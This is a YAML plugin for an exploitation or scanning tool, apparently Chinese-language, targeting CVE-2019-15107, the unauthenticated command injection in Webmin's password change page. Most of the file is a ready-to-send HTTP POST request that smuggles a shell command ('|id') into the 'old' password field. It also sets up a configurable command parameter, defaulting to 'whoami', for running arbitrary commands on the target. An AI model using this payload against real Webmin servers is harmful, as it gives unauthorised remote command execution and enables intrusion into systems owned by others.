info:
    app: Webmin
    name: CVE-2019-15107
    author: 小晨曦
    plugin_version: 1.0.0
    disclosure_date: "2019-08-15"
    create_date: "2024-10-08 10:13:17"
    update_date: "2024-10-08 10:13:17"
    scope: 1.882 - 1.921
    description: Webmin是一个用于管理类Unix系统的管理配置工具，具有Web页面。在其找回密码页面中，存在一处无需权限的命令注入漏洞，通过这个漏洞攻击者即可以执行任意系统命令。
    vul_id: CVE-2019-15107
    payload: |-
        POST /password_change.cgi HTTP/1.1
        Host: your-ip:10000
        Accept-Encoding: gzip, deflate
        Accept: */*
        Accept-Language: en
        User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
        Connection: close
        Cookie: redirect=1; testing=1; sid=x; sessiontest=1
        Referer: https://your-ip:10000/session_login.cgi
        Content-Type: application/x-www-form-urlencoded
        Content-Length: 60
        user=rootxx&pam=&expired=2&old=test|id&new1=test2&new2=test2
    reference: https://github.com/vulhub/vulhub/blob/master/webmin/CVE-2019-15107/README.zh-cn.md
    vul_type: 命令执行
payloads:
    - name: cmd1
      alias: 命令执行
      params:
          - key: cmd
            title: 命令
            param_type: edit
            default_value: whoami
            required: true
